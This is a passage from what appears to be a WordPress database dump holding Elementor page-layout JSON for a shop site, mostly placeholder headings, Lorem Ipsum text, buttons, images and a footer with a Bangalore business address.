here\",\"background_color\":\"#FF6E00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"374288e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"30868ff\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"_margin\":{\"unit\":\"px\",\"top\":\"19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"50ce1c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\",\"background_background\":\"classic\",\"background_color\":\"#C3C3C321\"},\"elements\":[{\"id\":\"6cb9f56\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":0},\"elements\":[{\"id\":\"d4fc894\",\"elType\":\"widget\",\"settings\":{\"view\":\"\",\"icon_list\":[{\"text\":\"List Item #1\",\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"_id\":\"99391c3\"},{\"text\":\"List Item #1\",\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"_id\":\"de33d81\"},{\"text\":\"List Item #1\",\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"_id\":\"4bd4895\"},{\"text\":\"List Item #2\",\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"_id\":\"6156b25\"},{\"text\":\"List Item #3\",\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"_id\":\"59990f4\"}],\"icon_align\":\"center\",\"divider\":\"yes\",\"divider_style\":\"dotted\",\"divider_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"32\",\"bottom\":\"32\",\"left\":\"32\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false},{\"id\":\"0e3e07c\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"c2e40a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f78ed1a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"39b0f4e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e9c825a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":125,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"152\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8446,1480,'_elementor_page_assets','a:0:{}'),(8448,1481,'_elementor_edit_mode','builder'),(8449,1481,'_elementor_template_type','wp-page'),(8450,1481,'_elementor_version','3.7.7'),(8451,1481,'_wp_page_template','elementor_canvas'),(8452,1481,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#0000007D\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"979ed75\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b78a11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\",\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"970607c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#F78A00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f16dea3\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"cc1fd22\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"f37b36f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fa36b21\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo<\\/p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"aa95f02\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#FF6E00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"374288e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"30868ff\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"_margin\":{\"unit\":\"px\",\"top\":\"19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"50ce1c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\",\"background_background\":\"classic\",\"background_color\":\"#C3C3C321\"},\"elements\":[{\"id\":\"6cb9f56\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":0},\"elements\":[{\"id\":\"d4fc894\",\"elType\":\"widget\",\"settings\":{\"view\":\"\",\"icon_list\":[{\"text\":\"List Item #1\",\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"_id\":\"99391c3\"},{\"text\":\"List Item #1\",\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"_id\":\"de33d81\"},{\"text\":\"List Item #1\",\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"_id\":\"4bd4895\"},{\"text\":\"List Item #2\",\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"_id\":\"6156b25\"},{\"text\":\"List Item #3\",\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"_id\":\"59990f4\"}],\"icon_align\":\"center\",\"divider\":\"yes\",\"divider_style\":\"dotted\",\"divider_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"32\",\"bottom\":\"32\",\"left\":\"32\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false},{\"id\":\"0e3e07c\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"c2e40a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f78ed1a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"39b0f4e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e9c825a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":125,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"152\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: 